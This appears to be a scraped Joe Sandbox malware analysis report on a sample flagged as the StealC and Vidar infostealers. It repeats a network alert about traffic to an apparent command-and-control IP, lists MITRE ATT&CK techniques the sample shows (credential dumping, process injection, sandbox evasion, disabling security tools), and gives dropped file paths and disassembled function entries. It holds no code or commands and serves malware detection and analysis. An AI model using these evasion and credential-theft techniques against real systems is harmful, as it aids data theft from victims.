Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AKFCFBAAEHCFHJJKEHJK

C:\ProgramData\CAAAFCAK

C:\ProgramData\EBFBFBFIIJDAKECAKKJEHCFIJK

C:\ProgramData\FCFHJKJJJECGDHJJDHDAAAFBKF

C:\ProgramData\GDBAKKKFBGDHJKFHJJJJ

C:\ProgramData\JJDBAAEGDBKKECBGIJEBGDAEBF

C:\ProgramData\KECGDBFCBKFIDHIDHDHIECGDHC

C:\ProgramData\KFCFBFHIEBKJKFHIEBFB

C:\ProgramData\KKECFIEB

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

Windows Analysis Report
file.exe

Function 00829860 Relevance: 65.0, APIs: 33, Strings: 4, Instructions: 212
libraryloaderCOMMON

Function 008145C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 00824910 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 172
fileCOMMON

Function 0081BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 6C6535A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Function 00829C10 Relevance: 229.9, APIs: 112, Strings: 19, Instructions: 684
libraryloaderCOMMON

Function 00817710 Relevance: 100.3, APIs: 54, Strings: 3, Instructions: 584
stringmemoryCOMMON

Function 00820250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre